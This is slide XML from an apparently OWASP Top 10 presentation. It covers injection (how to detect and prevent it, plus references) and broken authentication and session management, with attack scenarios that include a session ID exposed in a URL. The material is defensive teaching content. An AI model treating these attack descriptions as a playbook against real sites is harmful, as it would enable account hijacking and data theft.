                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>This changes the meaning of both queries to return all the records from the accounts table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.  More dangerous attacks could modify data or even invoke stored procedures.</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Am I Vulnerable To Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best way to find out if an application is vulnerable to injection is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP SQL Injection Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Query Parameterization Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Command Injection Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XML eXternal Entity (XXE) Reference Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS: Output Encoding/Escaping Requirements (V6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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11"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on SQL Injection Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 77 on Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 89 on SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 564 on Hibernate Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>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How Do I Prevent Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing injection requires keeping untrusted data separate from commands and queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface.  Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> provides many of these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>escaping routines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive or “white list” input validation is also recommended, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a complete defense as many applications require special characters in their input. If special characters are required, only approaches 1. and 2. above will make their use safe. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has an extensible library of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>white list input validation routines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 35"/>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A1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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11" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12"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13"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4"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5"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6"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18"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32"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6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79" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="30" idx="3"/>
                <a:endCxn id="32"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93"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29"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113" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="32" idx="4"/>
                <a:endCxn id="29"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17" name="Rectangle 16"/>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924737078"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="956458"/>
          <a:ext cx="6858000" cy="25284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3742">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30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2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 / Business</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5203">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anonymous external attackers, as well as users with their own accounts, who may attempt to steal accounts from others. Also consider insiders wanting to disguise their actions.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 uses leaks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> or flaws in the authentication or session management functions (e.g., exposed accounts, passwords, session IDs) to impersonate users.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Developers frequently build custom authentication and session management schemes, but building these correctly is hard. As a result, these custom schemes frequently have flaws in areas such as logout, password management, timeouts, remember me, secret question, account update, etc. Finding such flaws can sometimes be difficult, as each implementation is unique.</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may allow some or even </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>all</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> accounts to be attacked</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Once successful, the attacker can do anything the victim could do. Privileged accounts are frequently targeted.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or application functions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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Airline reservations application supports URL rewriting, putting session IDs in the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/sale/saleitems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;jsessionid=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  2P0OC2JSNDLPSKHCJUN2JV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?dest=Hawaii</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every users’ password to the attacker.</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Am I Vulnerable to Hijacking?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
